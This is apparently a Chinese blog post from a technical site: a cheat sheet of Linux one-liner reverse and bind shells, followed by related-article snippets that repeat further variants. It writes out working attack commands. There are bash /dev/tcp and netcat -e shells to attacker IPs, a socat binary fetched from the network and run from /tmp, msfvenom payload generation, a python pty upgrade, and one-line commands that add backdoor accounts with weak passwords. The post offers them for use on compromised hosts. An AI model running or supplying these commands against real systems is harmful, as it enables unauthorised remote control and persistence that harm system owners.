linux 反弹端口,linux各种一句话反弹shell总结

最新推荐文章于 2023-06-14 16:37:36 发布
最新推荐文章于 2023-06-14 16:37:36 发布
阅读量220 收藏
点赞数
文章标签: linux 反弹端口

1 nc开启本地监听发布bash服务

1    # nc -lvvp 12345 -t -e /bin/bash

2 常用反弹shell一句话

(1) bash 反弹一句话

1    # bash -i >& /dev/tcp/192.168.1.123/12345 0>&1

(2) nc 反弹一句话

1    # nc 192.168.1.123 12345 -t -e /bin/bash

(3) socat 反弹一句话

123    # wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat      # 第一步:下载socat到/tmp目录下# chmod 755 /tmp/socat          # 第二步:给socaat授予可以执行权限# /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.31.41:12345        # 第三步:反弹shell到目标主机的12345端口

3 利用msfvenom获取反弹一句话

(1) 查询 reverse payload 反弹路径

1    # msfvenom -l payloads 'cmd/unix/reverse'

(2) 生成相关反弹一句话

1    # msfvenom -p cmd/unix/reverse_xxxx lhost=1.1.1.1 lport=12345 R

剩下的就是将生成的payload 反弹一句话直接复制到靶机上直接运行即反弹一个shell出来。

4 使用python获取标准shell

直接在获取的废标准shell上直接运行一下python 一句话即可获取一个标准的shell。

1    # python -c "import pty;pty.spawn('/bin/bash')"

5 linux 一句话添加账户

(1)chpasswd 方法

1    # useradd guest;echo 'guest:123456'|chpasswd

(2)useradd -p 方法

1    # useradd -p `openssl passwd 123456` guest

(3)echo -e 方法

1    # useradd test;echo -e "123456\n123456\n" |passwd test

weixin_39759989
关注
内网渗透-常用反弹shell方法总结
lza20001103的博客
08-28 4729
常用反弹shell方法总结 文章目录常用反弹shell方法总结前言bash反弹shellnc反弹shell1.nc弹linuxshell: nc -e /bin/bash 1.1.1.1 99992. 如果linux中nc没有-e参数3.nc 弹windows下的shell:whois 反弹shell常见脚本反弹1.python2.phppowercat反弹shellmsf反弹shell 前言 bash反弹shell bash -i >&/dev/tcp/1.1.1.1/9999 0&gt
LinuxN种反弹shell方法
YUGUOHOU的博客
11-26 9959
什么是反弹shell?   反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口, 并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络 概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器 (目标ip:目标机器端口),这是比较
linux各种一句话反弹shell总结
weixin_34250709的博客
10-17 285
1nc开启本地监听发布bash服务 1#nc-lvvp12345-t-e/bin/bash 2常用反弹shell一句话 (1)bash反弹一句话 1#bash-i>&/dev/tcp/192.168.1.123/123450>&1 (2)nc反弹一句话 1#nc1...
一句话反弹shell
Jim的博客
08-21 4560
1.Bash: •bash–i >&/dev/tcp/10.0.0.1/80800>&1  //bash –i打开一个交互的bash, /dev/tcp建立一个socket连接, >&将标准错误输出重定向到标准输出中,0>&1将标准输入重定向到标准输出中。 •Linuxshell文件描述符: •1.标准输入:代码为0,使用 •2.标准输出:代码为1,使用>或>>; •3.标准错误输出:
Linux一句话反弹Shell细说
一杯咖啡的渗透记忆
08-11 486
简介 我们在渗透测试的过程中经常会遇到linux主机环境,而在获取linux主机shell是我们经常需要做的是工作内容之一,其中经常会遇到以下几个场景。 一、场景一 我们已经拿下主机的一个webshell,我们想获取一个可以直接操作主机的虚拟终端,此时我们首先想到的是开启一个shell监听,这种场景比较简单,我们直接使用使用nc即可开启,如果没有nc我们也可以很轻松的直接下载安装一个,具体开启监听的命令如下。 1.1 安装netcat 这里需要注意一点默认的各个linux发行版本已经自带了ne
LINUX shell反弹篇(一)
胖虎的博客
10-26 2123
linuxshell反弹的方法及原理
常用的一句话反弹shell总结
热门推荐
橘子女侠
05-20 1万+
目录 常用的一句话反弹shell总结 1. bash直接反弹 2. python一句话反弹shell 3. python脚本反弹shell 4. php一句话反弹shell 5. php脚本反弹shell 6. 使用nc命令获取靶机的反弹shell; 7. 使用Kali自带的脚本文件获取反弹shell 8. 使用msfvenom 获取一句话反弹shell 常用的一句话反弹she...
Linux反弹Shell总结
qq_45600801的博客
01-06 4300
反弹姿势 1、NC正向反弹 靶机: nc -lvvp 靶机端口 -e /bin/sh 攻击机: nc 靶机ip 靶机端口 2、NC反向反弹 (1)、可使用-e参数: 靶机: nc x.x.x.x 8888 -e /bin/bash 攻击机: nc -lvvp 8888 (2)、NC,无-e参数反弹shell 有些版本的NC可能不支持-e选项,不能使用-e,则: 方法一: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc
「渗透」:一句话木马反弹shell的思路
binaxin的博客
10-06 2188
前提:现在情况是已经上传了一句话木马,可以执行命令如:ls,pwd,whoami等;问题在于,不管用python、bash还是perl都反弹不了,偷不了懒,就上msf把。 http://target-ip/where/muma/path/are/1587808279743_shell.jsp?pwd=admin&cmd=pwd /u01/oracle/user_projects/domains/base_domain http://target-ip/where/muma/path/are/158.
经验分享 | 常用linux反弹shell合集
Uguardsec的博客
01-25 967
一、前言 当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句 来达到我们的目的。 二、反弹方法 攻击机:192.168.3.43 靶机:192.168.1.21 、192.168.249.12 1. Bash反弹 1.1 方法一 攻击者主机上执行监听: nc -lvvp port 目标主机上执行: bash -i >& /dev/tcp/x.x.x.x/port 0
端口复用/重用反弹shell
04-14
端口复用/重用反弹shell 可以利用系统已经开启的端口,如:139,445,1025等。
反弹端口型木马
rongwenbin的专栏
04-25 4276
首先要知道反弹端口的原理: 简单地说,就是由木马的服务端主动连接客户端所在IP对应的电脑的80端口。相信没有哪个防火墙会拦截这样的连接(因为它们一般认为这是用户在浏览网页),所以反弹端口型木马可以穿墙。 以下是在“网络神偷”的介绍中挖下来的:道高一尺、魔高一丈,不知哪位高人分析了防火墙的特性后发现:防火墙对于连入的连接往往会进行非常严格的过滤,但是对于连出的连接却疏于防范。于是,与一般的软件相
内网转发——反弹端口
cxrpty的博客
03-17 3901
反弹端口:是指受害者服务器的某一个端口不能访问,我们通过反弹端口的形式,让攻击者能够访问该端口,也叫端口转发 主要指以下情况: -1.访问服务器的3389端口,由于防火墙的原因,我们访问不了3389端口 原因:1.3389端口,防火墙没有开放 2.服务器处于公司内网,对外只发布了80端口 3.3389...
远程控制编程之反弹端口模式
08-28 2423
 远程控制软件的上线模式主要有两种:正向直连模式与反弹端口模式。正向直连模式远控需要输入对方的IP地址和端口(图1),比如Radmin就是正向连接。当被控端是ADSL拨号这种动态IP或者需要监控的机器比较多的话,一个个输入IP和端口是繁琐和不准确的。这时,聪明的远程控制软件开发者们设计了反弹端口模式(图2),比如常见的灰鸽子,PcShare等远控都使用了这个模式。这个模式主要用于两个目的,一是解决
流量映射端口反弹
niqiu320的博客
05-26 867
实验1:LCX端口转发 正向转发 内网主机执行:lcx.exe –slave 公网主机IP 公网主机端口 内网主机IP 内网主机端口 外网主机执行:Lcx.exe –listen 公网主机端口1 公网主机端口2 反向转发 外网主机执行:Lcx.exe -tran 53 目标主机IP 3389 试验二:PORTMAP端口转发 正向转发 内网主机执行:./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 公网主机ip -p2 6666 外网主机执行:./por
端口反弹工具lcx代码
kimqcn的专栏
01-11 966
#include #include #include #pragma comment(lib, "ws2_32.lib")#define SERVERNAME "itrusPorter"#define VERSION "v1.2"#define MAXBUFSIZE 8192#define ADDRSIZE 32struct SOCKINFO{ SOCKET ClientSock;
端口代理反弹shell原理应用
最新发布
qq_39641273的博客
06-14 446
我们发现在实际的攻击过程中,使用常规反弹shell攻击者的计算机IP地址将被暴露给受害者计算机,因为攻击者需要将自己的计算机IP地址提供给受害者计算机以建立连接。当对方具备一定的抓包和溯源能力就能借此溯源到攻击者。因此,对方反弹shell攻击可能会危及攻击者的匿名性和安全。这些技术可以用来隐藏攻击者的真实IP地址,从而增强攻击的匿名性和安全性。下面是一些常用的增强反弹shell匿名性的技术:端口转发:攻击者可以使用端口转发技术将流量从受害者计算机转发到攻击者的计算机上,从而隐藏自己的真实IP地址。
linux nc命令
qq_23587541的博客
08-14 288
 nc简介 NC 全名 Netcat (网络刀),作者是 Hobbit && ChrisWysopal。因其功能十分强大,体积小巧而出名,又被大家称为“瑞士军刀”。nc - TCP/IP swiss army knife nc 常用于溢出、反向链接、上传文本等。其实是一个非标准的 telnet 客户端程序。也是一个 putty.exe 客户端程序。 socat 是一个 nc ...
Linux反弹shell
weixin_64338385的博客
11-26 2312
0x01. bash 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 在攻击主机上执行端口监听: nc -lvvp port //port 为攻击主机端口 在目标主机上执行: bash -i >& /dev/tcp/攻击主机i...
Linux Bash反弹shell原理详解与操作过程
本文主要探讨了Linux环境下利用bash的反弹shell技术,该技术在攻击者无法直接连接到受害者机器时,通过让受害者主动连接到攻击者设置的端口来实现远程控制。本文以一个具体的场景为例,涉及攻击机(Kali Linux)和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值